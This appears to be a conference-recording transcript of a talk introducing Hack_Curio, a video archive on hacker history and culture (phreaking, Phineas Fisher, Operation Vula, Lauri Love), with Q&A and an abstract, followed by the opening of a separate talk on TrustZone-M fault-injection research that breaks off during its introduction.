University, wrote a really awesome entry about that. And, you know, of course, she emphasizes things like, you know, while hacking is often tied to computers, it's often tied to any system that you could understand, improve, fix, undermine. And the freakers really showed that, right. And of course, the history of phone freaking is about blind kids. Not everyone who was a freak was blind, but many of them were. They met each other in camp and kind of exchanged information. And that was one of the ways in which phone freaking grew. Phone freaking really grew as well when a big article in 1971 was published by Ron Rosenbaum in Esquire magazine. Who here has read that article? Has anyone? It's incredible. We mentioned, I think, in the piece. Check it out. Freaking freaking exploded after that article. The spelling of freaking changed from capital F, freak, to pH because of that article. Freaking also grew when blue boxes were created, right. This is also something that Joan writes about in her entry. One of the cool things that Joan writes about, and then I'm going to turn it over to Paul again, is that some freaks trained birds. Okay. It's a freaking freak. Let's just leave it at that because that's freaking cool. All right. Okay. Are you guys ready now to cringe? We need a little bit of a cringing moment as well. So without further ado, this is Steve Ballmer that would like to do some dancing. From Microsoft. Ladies and gentlemen, Steve Ballmer. Come on. Okay. Yeah, that's right. Can I just say one little thing? There's a remix of this with goats screaming. Like, look it up. It's awesome. I'll have it, exactly. But why do we show Steve Ballmer the sort of like Godfather? Exactly. Kind of an anti-hacker of sorts. I myself, an ethnographer who worked around corporate culture of software developers, aren't hackers per se. But if you think of a figure like Steve Ballmer, a lot of you guys who perhaps identify with yourself as hackers, you have day jobs. You go to work and you have to make some money in order to live and to work on your own projects. And you often have to face sort of mini Steve Ballmer's at work. And this is a quote that I have my own entry that I did right next to this video of Steve Ballmer. Even Ballmer's unbridled display of exuberance is exceptional. Many software developers still have to deal with mini Steve Ballmer's every day in their work. We're sorry that you do, but if you do, you do. Exactly. So this exuberance is all about these sort of slogans of win big, save the world while building technology, be awesome, be true, whatever it is your corporate slogan is. And there is, I think, in a way in which a software developer and sort of the hackers that work in their day jobs challenge this sort of really intense exuberance of wearing your corporate t-shirt and smiling every day in a way in which you hack your daily projects, you work on your own private projects on the side. You actually do have many acts of resistance in a way to this kind of loud, massive exuberance. And I talk about these sort of sideline mini hacks that happen on an everyday corporate culture. Check out her entry. It's really funny. All right. So now we're going to a hacktivist. So who here has heard of Phineas Fisher? All right. Awesome. Just in case for those who are watching the video now or later, I'm going to give a little bit of background. But I love this video about Phineas Fisher because he's explained what he or the group has done, but he also does kind of a very clever media hack. So for those that don't know who Phineas Fisher is, he or the group is a hacktivist that claims to be inspired by anonymous Jeremy Hammond. He's hacked into various corporations from Phineas Fisher to hacking team. And what he did was take documents, take email, and then publish them. And these were important in ways that I'll talk about in a moment. He's donated, I think, stolen Bitcoin to the Rojova government. And this fall, he published a manifesto kind of calling for public interest hacking and claims he would give $100,000 to anyone who does this. So now I'm going to show the first, and I believe the only interview that he has done. And he did this with Vice News a couple of years ago. Let's do this. These are the exact words from our live text exchange, voiced by one of my colleagues. So why did you hack, hacking team? Well, I just read the Citizen Lab reports on Phineas Fisher and hacking team and thought, that's fucked up. And I hacked him. What was the goal in hacking the hacking team data? Were you trying to stop them? For the lulls? I don't really expect leaking data to stop a company, but hopefully it can at least set them back a bit and give some breathing room to the people being targeted with their software. Okay, so this does not yet exist on HackKiria. I have to write the entry, but because I was so busy getting the whole other site in preparation, I haven't done it, but it will happen in the next few weeks. But what I love about this video is, first of all, he's like hacking media representations, right? I mean, even when awesome journalists like Motherboard publish on hackers or other kind of entities, they still kind of use a masked hacker. Even once they published about Phineas Fisher and they put like a mask on him. And I was like, hackers have heat. Like they don't need a mask, right? And there is this sense where there's always a kind of demonic mask figure. And he was like, okay, I'll do this interview, but you have to represent me as like a lovable, Muppet-like figure, right? So he's there hacking the media. But what's also really interesting, and do watch the full video, it's kind of amazing, is that, you know, he kind of claims, oh, I didn't have much of infect. I don't think he could do anything. But in fact, first of all, the information that was released really reaffirmed what people suspected. For example, in the case of hacking team who was selling problematic exploits by way to dictatorial regimes, we really got a confirmation that this was happening. And in fact, eventually, hacking team even lost their license, right? So this was like a direct effect from what Phineas Fisher did. So really, it's a kind of amazing video that showcases what he was doing, his reasoning, and then with a performance, literally, a puppet that hacked the media. Okay, so now we're going to rewind a little bit and go back in time. So a lot of hackers care about cryptography, right? And ever since the cypherpunks, and since that period, there have been projects from Tor to Signal that have enabled cryptography that has been really important for human rights activists and others. But one of the great, great kind of encryption projects came from this fellow, Tim Jenkins. Who here in the room has heard of Tim Jenkins? Okay, this is amazing. This is why we're doing kind of hack-kirry-o. So Tim Jenkins is from South Africa. And beginning in 1988, secret messages were sent and received regularly across South Africa borders using an encrypted telematics system assembled during the final years of the South African liberation struggle. And Tim Jenkins, along with Ronnie Press, who has since passed away, created the system. And Tim Jenkins was kind of like a phone freak, and that was one of the reasons he was good at working with phones. And what was amazing about this system, which was part of Operation Vula, was that it allowed people in South Africa to communicate with leaders in exile in London, right? And Tim Jenkins created this system. And we're going to show a video about it in a moment, and Sophie Tupin has written a terrific entry. The reason why we have him with a key there was that, like, you know, the South African apartheid government did not really like Tim Jenkins, so they threw him in jail. Well, a lot of hackers lockpick. He actually created 10 wooden keys secretly in the wooden shop and broke out of jail. And we can talk about, like, taking lockpicking to, like, another sort of level. All right, so let's listen and see the video about this incredible program. After we sent in the first computer, we expected things to start immediately, but it actually took a couple of weeks. And then suddenly one day I was sitting at my desk and the telephone answering machine suddenly started worrying. I thought, no, this must be just absolutely wrong number or something. But then sure enough, I heard the distinctive tones of the messages and I could hear this thing coming through. The tape word and word and word, and then it stopped and I loaded the message onto my computer. In fact, it was a report from Mac. And sure enough, there was our first message, absolutely perfect. The fax machine. Okay, so this is from the entry by Sophie Tupin, who is writing a dissertation on this topic. The international hacker community has since taken notice of Tim Jenkins and the Vula and cryptic communication system that embodies so many qualities often associated with an exceptional hack. Elegant, clever, usable and pragmatic, right? Jenkins has been invited to speak at the Berlin-Logan symposium in 2016 and to the lockpicking communities in the Netherlands and the United States. In 2018, the RSA security conference gave Jenkins the first award for excellence in humanitarian service. So just like one last thing, this is a good reminder that histories of computer hacking are often skewed. They often actually start with the United States, when for example in Europe with a CCC, that story has been told in bits and pieces, but deserves a much longer or much larger showcase. And actually, this example also shows that for example, the history of encryption when it comes to communication didn't even necessarily start in the United States, right? And so it's really, really important to kind of showcase these histories that haven't been told elsewhere. Exactly. So maybe by now you're kind of getting at the fact that we see hacking as a diverse practice, hackers as a diverse group of people who do different things. And at the moment, I want to come back to ways in which hackers challenge power through challenging really the very stereotype of what gender means, then challenging really gender politics. And it will turn to this topic by looking at an entry that a woman named Christina Dunbar-Hester has done on a woman named Naomi Cedar. And some of you probably know Naomi Cedar. This is part of her entry and she wrote, Naomi Cedar is a programmer and core participant in the Python programming language community. As a trans identified person, Cedar grappled with whether she would have to give up everything in order to transition and whether the community would accept her for doing so. So let's watch a clip of the video and let's see how Naomi Cedar challenged that. And one thing she gave this talk at PyCon, the Python open-source developer conference. And it's a really incredible talk. I really encourage you to watch the whole talk, but this is the moment where she's like, do I have to leave the community? Or can I transition in the community? Exactly. So let's watch a tiny clip of that. I decided that to do that would probably mean giving up everything. Remember back at 13, I had absorbed this into my brain that the only way you were going to get out of this was to basically leave everything. And this was a very painful thing to think about, but like a lot of trans people, I had come to the point where even if I lost everything, that was fine. So I started to think about other alternatives here. I had toyed with the idea of doing the education summit as a farewell thing to the community. I would do it and then disappear, go into the trans witness protection program. The only problem was I actually started accelerating the pace of my transition because, well, it was just such a freaking relief to start moving in that direction. That that wouldn't work. So I actually thought about what was for me, harking back to Leveron Cox, a very revolutionary idea. What if I just did it and was open about it? First thing I looked at, codes of conduct. I looked for specifics. What happens to me if there is a problem, if I am harassed? This was important to me. Other thing I did was I started telling a few people, Jesse Noller, Ava Yadloska, some people I would work with on PyCon, and they were all pretty cool with the idea. And the more I talked about it, the more I decided that I would go ahead and take that chance. So I did. I started by teaching at some Python workshops for women. I spoke at some conferences. We went to PyCon. It was good. The education summit was fine. Okay, some of the people I worked with in organizing it were a little bit confused when the names on the emails changed. I apologize. But in general, it went pretty well. In fact, the more open I was, the easier it was for me because I didn't have to worry about being outed. And it was easier for other people because they certainly knew what to expect. The other interesting side light is that when I told people, they sometimes felt an obligation to share some deep dark secret about themselves. I kind of trumped them and they had to answer back. So my takeaway here is that we talk a lot about diversity and that's real. So we should be ending on this point except that I'm a contrarian in my old age. So it is not quite all rainbows and unicorns. Or as you might put it, this is kind of common in social justice circles right now. We don't get a cookie. Exactly. All right. And yeah. It's a very powerful play. Exactly. And I guess we could also say that the next step I want to show that after the entry by Christina Dunbar-Hester, Naomi Cedar actually gave a response to this entry, which we've also published, which we also want to do. We want to have a discussion between some of the responses to the actual entries themselves. It's very powerful. So we actually wanted to quote it in full. Yeah, exactly. So perhaps let's read this section from the response of Naomi Cedar. PyCon itself has continued to evolve into an ever more diverse place with an ever stronger representation of queer folks, people of color, people who speak different languages, et cetera. Codes of conduct are nearly universal these days. And more often than not, communities insist that they be well-crafted and meaningful and backed up by real enforcement. Even in these retrograde times of official attacks on the rights of so many groups, we have come a long way. But just as I said five years ago, it's still not all rainbows and unicorns. Too many groups throughout the open source world globally are making only token efforts to foster inclusion. And in my opinion, too many members of privileged groups tend to focus on superficial or cosmetic changes rather than addressing the underlying fundamental issues marginalized groups face. It doesn't take a bit away from how far we've come to also acknowledge how much we still have to do in Naomi Cedar. So this really part, we wanted to discuss this in the way in which hacking is also a practice of challenging power, challenging stereotypes, and challenging really gender norms in many ways. All right, let's move on. All right, so the final frontier. We have three more videos to show before we get to the Q&A. In all videos relate to geopolitics and hacking. You know, hacking has always been political in some fashion. If for no other reason than sometimes laws are challenged or you're doing something that someone doesn't want you to do, right? But there's only been certain moments where nation states have been interested in hacking, or there have been sort of ways in which nation states have used hacking, for example, recently in order to kind of engage in international politics. So we're going to kind of focus on these last, the last three videos will focus on these issues. We're at the CCC, so of course I wanted to show a video related to CCC. Unfortunately, I don't have one related to the German CCC, please do send good videos related to the CCC to me. But I am going to show one related to the FCCC, established in Lyon by Jean Bernard Condat. So do people know what the F stands for? All right. Okay, what's going on here? What does it stand for? French. French. Okay. Once you see the video. Hold on. You will also see that it stands for fake and fuck as well. Because basically the French chapter of the CCC was established in part to try to entrap hackers in order to kind of work for the French government. It's a fascinating story that's been told in bits and pieces. And I'm going to say a little bit more about it, but now I'm going to show a clip from a French documentary that kind of charts a little bit of that history. It's in French with subtitles. And quickly, the different teaching services have all tried to integrate the skills of these network users. We arrived at 6am to arrive at a pavilion located in the province, around, and to knock on the door to say, here is the police, the purchasing, to have parents who will open our eyes. And we say, my son, my son, but he never left his room, he's always in his room, etc. In fact, it was a very pious pirate and he was younger. So that means that we are to make a new population. We are a little bit immune to this problem. And we couldn't recruit people like that for the house. On the other hand, why wouldn't we do the national service of people who are interested in the national service? Of people who are well-known, who could work not in the shadow, but for the nation. So we started to recruit people. At the time, we didn't say to the heart, we said to the pirate, who helped us understand. In France, it was the time when the undergrounds of the DST, the Baleno, recruited by General Guillaume, alias the Baleno. I was only there for the first year, I was only there for the second year, and then it was my turn until the 15th. I received all of them personally before, so I had to open the shopping centers, the profits I was looking for. I received the guys and I selected them according to the way of the mood. The more I laughed, the more serious it was for me. Because you have to be crazy to do that, you have to have fun. Every year we had a new Baleno, and every year, he could bring us something new. But they were the most vulnerable people. Others were proud of themselves, because they were trialed on the flight. The KGB did the same thing as we did, since they didn't have many doctors, they were just like Jesus, and they detected people who were actors, and they told them, listen, instead of having fun, I'll pay you a little more if you go and see such or such systems. The Americans didn't like it. In 1991, I'm on a TV show and I see an actor, a presenter called Jean Bernard Condat. I'm representing a group, and I recently was born, it's called the CAU, the computer club in France. And I see myself on the stage, who is in fact in a mess with the policemen who are also present. I want to know, can I enter the Ministry of Iraqi Defense? I want to know how many munitions they have currently in their stock. Here, page 629 of this show. Iraq, the Idaas network, I-D-A-S, managed by the association called BTC, the access code, zero to exit, 41.81 access codes. Then you search in the paragraph in front, I won't come to the number of the central computer of the BTC society, to whom you will ask the whole of the government, media... Okay, so pretty incredible, right? And this story has been told in bits and pieces by French journalists. I'm working with another French journalist to try to kind of uncover the fuller history, as well as tell the story of kind of American and European hackers who did not get recruited by intelligence, but who nevertheless came from the underground, because they were breaking into systems, not maliciously, but they learned a lot, and they had really valuable knowledge that no one else had. I mean, it's kind of really incredible, right? And, you know, this history, whether it's just the transformation of the underground into security hackers, or in the case of France, where some portion of people were tapped to work for intelligence, informally, formally, with pressure, right, has yet to be written. And there's many remarkable elements about this, but basically I do think it's remarkable that it's a bunch of kind of amateurs who just were obsessed with networks, who were the ones holding the special knowledge that was needed by corporations and intelligence in order to start securing systems, right? The other kind of really interesting thing is that some of the best underground, non-malicious hacker crews were European. TISO, which had a lot of Austrian and German members, ADM, which is from France, was considered to be the best at exploit writing, right? So the entry, which I'm going to write with a French journalist, is going to reflect on this, and this is actually a big project that I'm working on as well, so I'll have more to say about it later. All right, so going from the past to the present. I mean, I guess we couldn't talk geopolitics and hacking without talking about Trump, talking about Putin. A slew of politicians that we know in recent years have used the hacker for their own political discourse, for their somehow political gain, and this next video will show us just that. This is under our hacker depictions section. It was posted by a scholar named Marietta Bozovic. So without further ado, let's listen to the way in which Putin sees the hacker. Russia is not doing well. Maybe theoretically, but the most important thing is that I'm deeply convinced that no hackers can adversely influence the hunt for a election campaign in another country. But it's all right. It doesn't affect the consciousness of the voters, the consciousness of the people, it doesn't affect any information, and it doesn't affect the final result. So that's my answer. We don't take the state level. We don't do it, we don't plan to do it. On the contrary, we try to do it. In some ways, yes, it's true that hackers are artistic and creative, etc. They just don't wake up early in the morning. Exactly. Maybe they don't wake up early in the morning. But what's important, I think, in here, and this is also what Bozovic points out in her entry, is that he uses this, of course, for his political gain to show that he is not influencing any hackers or any technologists who maybe identify as hackers or not. Influencing them, and because they are so free and artistic and sort of living in their creative world, that they're beyond his control. So partially it's true, but partially he's employing this to make a political statement about his non-involvement with any sort of... And what's interesting is all evidence points to the fact that the technologists who did the hacking just work at intelligence organizations. So we just have one more video, and we want to end on a positive note. A lot of stuff around hackers is sometimes depressing, especially when it comes to the law. They get arrested, they get thrown in jail, they commit suicide. And so we want to showcase a video that covers British and Finnish hacker Laurie Love, who's presented here at the CCC. Some of you may know that he faced extradition to the United States due to his alleged involvement with anonymous operation called OP last resort, which was kind of in support of Aaron Schwartz, who had committed suicide when he was facing many criminal charges. And we'll watch a clip where parliamentarians and others debate his case. A young man with a Sperger's syndrome awaits extradition to the United States facing charges of computer hacking, and is then likely to kill himself. It sounds familiar. He's not, of course, Gary McKinnon, who was saved by the Prime Minister, but Laurie Love, who faces in effect a death sentence. So when the Prime Minister introduced the foreign bar to in her words provide greater safeguards for individuals, surely she expected it to protect the vulnerable, like Gary McKinnon, like Laurie Love. The Honourable Gentleman, my Honourable Friend, obviously campaigned long and hard for Gary McKinnon, and obviously I took that decision, because at that time it was a decision for the Home Secretary to decide whether there was a human rights case for an individual not to be extradited. We subsequently changed the legal position on that, so this is now a matter for the courts. There are certain parameters that the courts look at in terms of the extradition decision, and that is then passed to the Home Secretary, but it is for the courts to determine the human rights aspects of any case that comes forward. It was right, I think, to introduce the foreign bar to make sure that there was that challenge for cases here in the United Kingdom, as to whether they should be held here in the United Kingdom, but the legal process is very clear, and the Home Secretary is part of that legal process. Lenin Keika. Okay, so the author of the entry, Naomi Colvin, is right there in the front, and she has a great sentence which says, In Lori Love, the US had definitively chosen the wrong target, principled, passionate, and articulate, certainly more articulate than Teresa May herself in the clip, which accompanies this article, Love vs. USA would be one for the underdog, and it was Love 1, he's not being extradited, and in part it was also because Naomi Colvin was part of the team that stopped it, so let's thank Naomi as well. And it's just really important to document some of the wins every once in a while, so do check that out. So we are now going to wrap up so that there's going to be 10 minutes for Q&A, but a few final reflections about this project. Exactly, so I think these videos show actual hackers and hackings, and at a more meta level demonstrate how hackers have become central to our popular imagination, how hackers and hacking are one medium to think through digital cultures, to think through politics. I mean, we care about culture, we care about representing, digging deep, looking at various angles of a certain culture, and I think that's the purpose, or I see this as the purpose of Biela, mine, Chris's, and our friends' projects, is that we really want to take the work that we've been doing and really pay tribute to this really huge, diverse community that you are. On a more practical level, being a little less meta, we do hope that people assign HackKirio entries in their courses, you could use them in high school, you could use them in college classes, maybe you could even use them in middle school, elementary, I don't know if that will work, but get it out there, and also for some of you, I think it will be fun to look at different tidbits of hacker history, and when you're at home for the holidays before you come to the CCC and you're like, oh man, my parents, they don't really understand what I do, you can fire up a video that kind of represents what you do and fire up another video that represents what you don't do. Exactly, and have a discussion instead of talking about politics, yeah. And so this is our last slide, what next? The site is live, share it. Our Twitter address is up there, we consider this a soft launch. We have 42 entries, but we'll get some feedback and tweak things, send video suggestions, spread the word. And to end, before Q&A, we just really want to thank the CCC, we want to thank Lisa for having us here, this is really an amazing place to launch, and we also want to thank everyone who made this possible from funding to the authors to the entire HackKirio team, so thank you so much, and we're here for a little bit of Q&A. Yeah, thank you. Thanks a lot for this beautiful talk. We are now open for the question mics. If there's any questions from the audience, please just stand up to one of the mics. Don't be shy. Nobody's more interested in hacking culture? Are you overwhelmed? There's someone on mic one, please. Thank you for this talk and for the energy that was in your talk, it was just amazing. I have one question to ask, what were the surprising moments for you in this research journey? Okay, that's a good question. In terms of the project, collaborating with others and building a website is very different than what academics often do, where we do often have to rely on ourselves and we get feedback. I think it does give a sense of the really beautiful relations at form, where you go back and forth with an author, with a web developer. It really does give you a sense of the deep social ties. We do have academics, but I think it's much deeper with hackers, so that's one thing. I am frustrated as an academic, where a lot of people do have very, very, very narrow conceptions of hackers. It's not a perfect world and there's a lot which we can change. It was very clear also that as academics, we weren't necessarily changing perception so much. This project was an effort to finally do that. It's like, see them, stop listening or reading just my words, because obviously that's not really changing Jack. So come see some of the videos. Yeah, and I guess for me, if you work in your own little bubble and you work in your own little corner, just in any type of science, you don't see as much as what's going on up there. For me, the whole definition of what it is to hack, what a hacker actually is, you start really opening your eyes out when you see, wow, there's 50, 100 other scholars out there that actually think a hacker is this or a hacker is that. And I think for me, that opened my eyes out really to think, hey, wow, this is what you think it means. That's so interesting. Thank you. Now a question from Mike too, please. Hi, thank you for the talk. It was very enlightening. I have two questions. The first one would be, could you tell us maybe a bit more about the server and the infrastructure you're using or are you just linking YouTube videos? The second one would be, how would you envision future engagement with students? Because I'm teaching a course for computer science test undergrads and we did something similar around movies and descriptions that they have to make around hacker movies. And they don't really learn how to reflect on social issues a lot in their studies. So I wonder how this could be integrated into the platform and how you could engage students further. So great questions. I mean, first of all, for the website, it runs on WordPress. It just seemed like an easy way to hack it up for this sort of thing and we hired actually a master's student from my department at McGill University. Thanks Joel, you're awesome. And then we're hosting the videos on Vimeo and they come from all sorts of different places. That's actually not the best or the most ideal solution in so far as like, you know, who knows if Vimeo is going to exist in 15 years, right? Internet archive, we looked into them and they were kind of like psyched about it, but it was going to be slower to deliver the video, right? So maybe if the project grows, we can at a certain point host our own videos, right? But like we'll have to sort of graduate there at the next level. The entries are all going to be creative commons and we're using clips that then we cite the entire clip and where it came from. We consider this fair use for those that may be wondering. And so we'll see how that goes. And for the second, I guess I could take the second question. Whenever I mean my students are not their digital media students, they're not competing science. But if you ever even try to touch along something around culture or something maybe around social sciences, always I think ask how is power related, how do these people relate to power? How do they relate to critique? How do they use these tools to critique something? And I think all of these videos and maybe even the videos that your students chose, if they just ask that question, whether they're studying computing science, whether they're studying geography or whatever it is, if they look at it from a form of power and how it's contested, I think that that's a way in which they really can engage into a certain topic really deeply. There's a nice little text by Foucault that's called What is Critique? I use it for my students that are non-maybe cultural studies students or whatever. That's a nice little text that could be with that. Thank you. One more question from Mike too please. So thank you again. And I wanted to ask you because I looked at the videos on the side and I see a lot of stories of single people. And I'm quite surprised to find very little stories of communities and showcases of hacker spaces. A lot of researchers I've spoke about are actually focusing on how communities work. So was there any conscious decision that you want to tell singular people's, singular person's stories instead of communities? First of all, that's a great piece of feedback because one of the things as an anthropologist that I've always loved about the hacker world is on the one hand, people often talk about rights that are tied to notions of individualism, but hacking is so collectivist. I mean look at the CCC. I mean you can't have a better example of a kind of ritual collective, effervescent experience, hacker spaces, right? So I do think it's really important to try to showcase that. And we do have videos around hacker spaces and they're being written up like the authors are writing about them now. But if that's not coming through the sites, we actually need to, right? But it does show, I mean one of the problems with video, and we will reflect on this, is that on the one hand while you could put a face to hacking, which is great, it's like it's not the hooded person, video has its own limits, right? Often it's an individual. It's often what journalists are interested in. And we also have to make sure that this isn't the whole of hacking. And also at times use the video to tell a different story than what the video is showing. So I think that's a great comment and we're going to keep that in mind because to me the collectivist community part of hacking is one of the most amazing parts that never makes it into kind of mainstream representation. That's great. Thank you. Thank you. Then we have a question from the internet first. Internet. Tell us. Hi. Talk to us. The question from the internet is when covering international scenes, are scenes like FRAC magazine use a source material? Is FRAC magazine a source? Yeah. I mean, FRAC magazine, remember the video that I showed around the fake French CCC? That is a larger project around how parts of the underground went pro and started doing security work. And FRAC is amazing. I mean, FRAC tells so much of that story. And what is also so interesting because I've done like almost 26 interviews, in-depth interviews around this. And like you'd expect in many hacker circles, there's a lot of diversity of opinions. And the one thing that people agree on was that like FRAC was awesome technically. And it brought very different types of people together. You know, FRAC hasn't come up in the video because it's one of these things that hasn't been documented, right? So much in documentaries or film. And again, it points to that problem, which is on the one hand, we're trying to show the faces of hacking. But we also have to make very, very clear that there's certain parts of hacker history that don't exist in video and don't take this as the definitive sort of word or record. No. Now the question from microphone two, please. Hi. I was wondering whether you plan to expand your categories if I didn't miss anything to something. For example, in my PhD, examples of hacking connected with biology, genetics, and digital fabrication, neurohacking, and so on. And also here at the CCC, there's a track dedicated to science that I think it's somehow related. Thanks. Great. Yeah, so if I can count correctly, I think we have 11 categories and we absolutely are expanding. And like biohacking is one that we want to include because actually, you know, hackers are like creating insulin in the context of the United States where insulin is ridiculously expensive. And some of the most important hacking, I think, is happening. So we're absolutely going to expand by a handful. We also don't want to go much more beyond 15 or 18. And one of the ways that we're also then handling that is that each entry comes with tags. And then there's going to be other groupings around tags. And certainly, I mean, what you've seen is live. It's live. It's live. But it's also very much beta. Yes, exactly. And if you've written also on this topic and you have an interesting video, please email us. Send it over. We'd be really interested to hear about your research. Yeah. And then we have another question on mic one, please. Thank you. My question is for Bella and it's about, would you say that your work with an on anonymous affected the way you engage with working with video after, after going deep into seeing how anonymous uses video as a medium to engage with the public as compared to other activist groups who are very less successful in that. That's great. I mean, that is definitely, you know, I on the one hand always use video in my class. And it's not just like hackers, you know, if I'm talking about Martin Luther King and something he said, I will show a video of what he said, because having me repeat it versus having MLK on the screen. And it's a lot more persuasive and we are in a moment where truth is not winning the game and we have to think about our game of persuasion. Right. That's just this is a kind of side project. But you're absolutely right. It was also anonymous who use so many videos, right, in a period where sure others had used videos, but it was groups like for example, in the media who turned 20 this year, who took videos of the world around us. Whereas anonymous created videos as a means for persuasion and it was very powerful at the time. And I am I am inspired to think about how can we think about persuasive mediums in all contexts in order to get our message out because again, we're not always winning in this regard. Truth can never speak on its own. Right. And we always need adjuncts and adjuvants in order to get truth message out there. And certainly it was anonymous in part that that helped me see the importance of video in a new way. So I'm really glad you mentioned that. Thank you. And then we have another question from the Internet. Yeah. And the next question from the Internet is how will you select the right curators for the entries and how do they decide how they are presented and contextualized? All right. So I mean, I've been working on hacker cultures for since 1998. Yeah. Mine is a journey has been a little bit shorter, but also for about 10 years. Yeah. And so I do. I know a lot of people working on different topics. And for the first round, we invited people. And it wasn't just academics. I've gotten journalists and have hackers are writing some entries as well. But they're just like a little bit harder to kind of get them to turn in their entries. And hopefully they will because again, it's not just who's been credentialed to talk about a topic. It's who knows about a topic, who has something to say and who's willing to go through the editing process. Because while journalists generally don't have to go through multiple edits because you all just really know how to write for the public, everyone else actually does struggle a little bit. And we do really try to get the entries written in such a way where we're presuming you know nothing about hackers or the video. It's not always easy then to write an entry that kind of starts from that low level. And then in terms of the contextualization, that's where we have three editors and curators. And I would actually even say four because our final editor, Matt Gorson, he was an MA student under me. He's doing a big project on security hacking with me at Dayton Society. He knows a ton. And it's precisely having many eyeballs on one entry that allows us to hopefully contextualize it properly. But you know, again, if something seems off, people should email us. And again, we're also open to responses from the community as well, which we have one response from Naomi, but you know, perhaps that will kind of grow into something larger. So when you ask why or why is it us that are curating or who's curating really, it's just a three of us that are doing this. And what kind of speech position are we coming from? I mean, we're anthropologists of hacker cultures. What does that mean? Maybe for you guys, it doesn't mean much or it means a lot or it's really, we've studied you guys for a long time. Yeah. But it's also cool because it's like, well, except for Paula, I mean, Chris and I, like, we have tenure and that may mean nothing to you all, but you know, hackers care about freedom and free speech. And tenure allows you to be free. I have tenure now. Oh, you do? Sweet. We all are free to kind of do what we want in interesting ways. And again, we're trying to experiment with mediums that go a little bit beyond the academic journal, which I'm totally behind. I think that there's really good things about the academic journal. I think there's really good things about the book, but we have the freedom to experiment with new mediums. And so hopefully this new medium will kind of reach different types of publics in a way that kind of academic journal articles will never reach. Are there any more questions? Party, party. Yeah, it's time. It looks like it. So I would like to invite you for another round of applause for Bella and Paula. Thank you guys. Thank you so much. You
Hacking and hackers can be hard to visualize. In the popular imagination, the figure alternates between a menacing, hooded figure or some sort of drugged-out and depressed juvenile hero (or perhaps a state-sponsored hacker). To counter such images, a group of us have spearheaded a new digitally-based video project, Hack_Curio that features hacker-related videos, culled from a range of sources, documentary film, newscasts, hacker conference talks, advertising, and popular film. In this talk, the Hack-Curio creators and builders will briefly discuss the purpose and parameters of Hack_Curio and spend most of the talk featuring our funniest, most compelling videos around hacking from around the world. We will use these to reflect on some of the more obscure or less commented on cultural and political features of hacking--features that will address regional and international dimensions of the craft and its impacts around the world. Hacking and hackers can be hard to visualize. In the popular imagination, the figure alternates between a menacing, hooded figure or some sort of drugged-out and depressed juvenile hero (or perhaps a state-sponsored hacker). To counter such images, a group of us (Chris Kelty, Gabriella Coleman, and Paula Bialski) have spearheaded a new digitally-based video project, Hack_Curio that features hacker-related videos, culled from a range of sources, documentary film, newscasts, hacker conference talks, advertising, and popular film. In this talk, the Hack-Curio creators and builders, will briefly discuss the purpose and parameters of Hack_Curio and spend most of the talk featuring our funniest, most compelling videos around hacking from around the world. We will use these to reflect on some of the more obscure or less commented on cultural and political features of hacking--features that will address regional and international dimensions of the craft and its impacts around the world. We will begin our talk by telling the audience what drove to build this website and what we learned in the process of collaborating with now over fifty people to bring it into being. After our introduction, we will showcase about 7-10 videos drawn from quite different sources (ads, parodies, movie clips, documentary film, and talks) and from different parts of the world (Mexico, Germany, South Africa, France) in order to discuss the cultural significance of hacking in relation to regional and international commonalities and differences. Finally, we will finish with a short reflection on why such a project, based on visual artifacts, is a necessary corollary to text-based discussions, like books and magazines, covering the history and contemporary faces of hacking.
10.5446/53149 (DOI)
Our next speaker's way is paved with broken trust zones. He's one of Forbes 30 under 30s in tech and please give a warm round of applause to Thomas Roth. I'm a security researcher, consultant and trainer affiliated with a couple of companies. Before we can start, I need to thank some people. We've been super helpful and anytime I was stuck somewhere or just wanted some feedback, they immediately helped me. Also Colin O'Flynn, he gave me constant feedback and helped me with some troubles, gave me tips and so on. Without these people and many more who paved the way towards this research, I wouldn't be here. Also thanks to NXP and Microchip, who I had to work with as part of this talk and it was awesome. I had a lot of very bad vendor experience, but these two were really nice to work with. Also some prior work, Colin O'Flynn and Alex DeVire released a paper last year on device power analysis across hardware security domains and they basically looked at trust zone from a differential power analysis viewpoint. Otherwise trust zone is pretty new, but lots of work has been done on the big or real trust zone and lots of work on fault injection. It would be far too much to list here. Just Google fault injection and you'll see what I mean. Before we start, what is trust zone? Trust zone is the small trust zone. It's a simplified version of the big trust zone that you find on Cortex-A processors. If you have an Android phone, chances are very high that your phone runs trust zone and that your key store of Android is backed by trust zone. Trust zone splits the CPU into a secure and non-secure world. For example, you can say that a certain peripheral should only be available to the secure world. For example, if you have a crypto accelerator, you might only want to use it in the secure world. It also, if you're wondering what's the difference between MPU, it also comes with two MPUs, sorry, not MMUs MPUs. So last year we gave a talk on Bitcoin wallets and so let's take those as an example. On a Bitcoin wallet, you often have different apps. For example, for Bitcoin, Dogecoin or Monero and then underneath you have an operating system. The problem is kind of that this operating system is very complex because it has to handle graphics rendering and so on and so forth and chances are high that it gets compromised. If it gets compromised, all your funds are gone. With trust zone, you could basically have a second operating system separated from your normal one that handles all the important stuff like firmware update, key store attestation and so on and reduces your text surface. The reason I actually looked at trust zone M is we got a lot of requests for consulting on trust zone M. So, basically, after our talk last year, a lot of companies reached out to us and said, okay, we want to do this, but more securely and a lot of them try to use trust zone M for this. And so far, there's been, as far as I know, little public research into trust zone M and whether it's protected against certain types of attacks. We also have companies that start using them as secure chips. For example, in the automotive industry, I know somebody who was thinking about putting them into car keys. I know about some people in the payment industry evaluating this and a set of hardware wallets. And one of the terms that come up again and again is this is a secure chip. But I mean, what is a secure chip? Without a threat model, there's no such thing as a secure chip because there are so many attacks and you need to have a threat model to understand what are you actually protecting against. So, for example, a chip might have software features or hardware features that make the software more secure, such as NX bit and so on and so forth. And on the other hand, you have hardware attacks, for example, debug ports, side channel attacks and fault injection. And often the description of a chip doesn't really tell you what it's protecting you against. And often I would even say it's misleading in some cases. And so you will see, oh, this is a secure chip and you ask marketing and they say, yeah, it has the most modern security features. But it doesn't really specify whether they are, for example, protecting against fault injection attacks or whether they consider this out of scope. In this talk, we will exclusively look at hardware attacks. And more specifically, we will look at fault injection attacks on trust on them. And so all of the attacks we're going to see are local to the device only. You need to have it in your hands and there's no chance normally of remotely exploiting them. Yeah. So this will be our agenda. We will start with a short introduction of trust on them, which will have a lot of theory on memory layout and so on. We will talk a bit about the fault injection setup. And then we will start attacking real chips, these three, as you will see. So on a Cortex M processor, you have a flat memory map. You don't have a memory management unit and all your peripherals, your flash, your RAM, it's all mapped to a certain address and in memory. And trust on them allows you to partition your flash or your RAM into secure and nonsecure parts. And so, for example, you could have a tiny secure area because your secure code is very small and a big nonsecure area. The same is true for RAM and also for the peripherals. 